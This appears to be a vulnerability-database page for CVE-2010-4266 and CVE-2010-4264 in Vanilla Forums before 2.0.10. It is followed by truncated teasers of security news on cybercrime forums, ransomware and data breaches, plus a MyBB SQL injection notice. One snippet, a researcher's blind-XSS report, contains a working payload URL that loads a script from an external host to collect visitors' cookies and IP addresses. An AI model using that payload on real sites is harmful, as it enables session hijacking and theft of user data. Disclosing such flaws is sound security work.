CVE-2010-4266

CVE-2010-4266 affects Vanilla Forums prior to 2.0.10, with a dispatcher-related issue described as a potential linkbait vulnerability in the software. The available connected documents corroborate the affected product (Vanilla Forums) and version boundary (before 2.0.10). No explicit root-cause o...

CVE-2010-4266

It was found in vanilla forums before 2.0.10 a potential linkbait vulnerability in dispatcher...

CVE-2010-4264

Vulnerability: CVE-2010-4264 affects Vanilla Forums prior to 2.0.10, where a filename could contain arbitrary code that executes in the client (XSS). Affected product/versions: Vanilla Forums before 2.0.10. Root cause: filename-controlled input enabling client-side script execution. Impact: cross...

CVE-2010-4264

It was found in vanilla forums before 2.0.10 a cross-site scripting vulnerability where a filename could contain arbitrary code to execute on the client side...

vanilla forums 输入验证错误漏洞

Vanilla Forums is a PHP-based open source forum program from Canadian company Vanilla Forums. A security vulnerability exists in versions of vanilla forums prior to 2.0.10 that stems from a potential link bait...

Vanilla Forums 跨站脚本漏洞

Vanilla Forums is a PHP-based open source forum program from Canadian company Vanilla Forums. A cross-site scripting vulnerability exists in versions of vanilla forums prior to 2.0.10, which stems from a filename that may contain arbitrary code to be executed on the client side...

Where Bug Bounty Programs Fall Flat

Eavesdropping on the chatter of 600+ cybercriminal forums shows that cybercriminals have specific preferences, shown by the flavors of exploits they requisition, and that the bug bounty programs either are too slow, don’t pay enough or are just the start of profit-making. A year-long study into t...

DarkSide Getting Taken to ‘Hackers’ Court’ For Not Paying Affiliates

Cybercriminals who have worked as affiliates with ransomware group DarkSide, responsible for the Colonial Pipeline attack, are having a tough time getting paid for their work now that the group has had its operations interrupted; so, they’re turning to admins of the group’s Dark Web criminal foru...

Microsoft, Adobe Exploits Top List of Crooks’ Wish List

A year-long study into the underground market for exploits in cybercriminal forums shows that crooks are salivating for Microsoft bugs, which are far and away the most requested and most sold exploits. According to researchers see chart below Microsoft products made up a whopping 47 percent of th...

Vanilla: BlIND XSS on https://open.vanillaforums.com

Hello sir My name is Mohit Kumar and i'm a security researcher i found a bug in your website knows as Blind xss just open this link -- https://open.vanillaforums.com/search?Search=%22%3E%3Cscript+src%3Dhttps%3A%2F%2Fhackerookie.xss.ht%3E%3C%2Fscript%3E --- i will recieve your cookies and ip too...

The Wages of Password Re-use: Your Money or Your Life

When normal computer users fall into the nasty habit of recycling passwords, the result is most often some type of financial loss. When cybercriminals develop the same habit, it can eventually cost them their freedom. Our passwords can say a lot about us, and much of what they have to say is...

Ransomware Attack Creates Dutch Cheese Shortages

An Easter weekend ransomware attack on a food-logistics firm in the Netherlands has caused shortages of prepackaged cheese in supermarkets across the country. The largest Dutch grocery store chain had some bad news for a cheese-mad nation. “Due to a technical malfunction, there is limited...

ParkMobile Breach Exposes License Plate Data, Mobile Numbers of 21M Users

Someone is selling account information for 21 million customers of ParkMobile, a mobile parking app thats popular in North America. The stolen data includes customer email addresses, dates of birth, phone numbers, license plate numbers, hashed passwords and mailing addresses. KrebsOnSecurity firs...

Indian Brokerage Firm Upstox Suffers Data Breach Leaking 2.5 Millions Users' Data

Online trading and discount brokerage platform Upstox has become the latest Indian company to suffer a security breach of its systems, resulting in the exposure of sensitive information of approximately 2.5 million users on the dark web. The leaked information includes names, email addresses, dat...

Call of Duty Cheats Expose Gamers to Malware

Activision, the company behind Call of Duty: Warzone, has issued a warning that a threat actor is taking out ads for cheat tools, which instead turn out to be remote-access trojan RAT malware . The scam was first floated in March when a cyberattacker posted in hacking forums that they had a free,...

MyBB SQL Injection Vulnerability (CNVD-2021-25711)

MyBB is a free open source forum software. A SQL injection vulnerability exists in the Copy Forums feature of the Forum Manager in versions of MyBB prior to 1.8.26. No detailed vulnerability details are available at this time...

MyBB SQL注入漏洞

MyBB is a free open source forum software. A SQL injection vulnerability exists in the Copy Forums feature of the Forum Manager in versions of MyBB prior to 1.8.26. No detailed vulnerability details are available at this time...

Top Russian hacker forums Maza, Verified hacked; data leaked online

By Waqas It is unclear who hacked these forums but insider discussion believes government authorities were behind the attack as a "friendly warning" message. This is a post from HackRead.com Read the original post: Top Russian hacker forums Maza, Verified hacked; data leaked online...

Three Top Russian Cybercrime Forums Hacked

Over the past few weeks, three of the longest running and most venerated Russian-language online forums serving thousands of experienced cybercriminals have been hacked. In two of the intrusions, the attackers made off with the forums user databases, including email and Internet addresses and...

VMware Carbon Black Champions Data Privacy Day 2021

Today is Data Privacy Day, an annual effort hosted by the National Cybersecurity Alliance NCSA to raise awareness about the importance of privacy and protection of personal information. VMware Carbon Black is proud to be an official Champion, supporting the principle that all organizations share...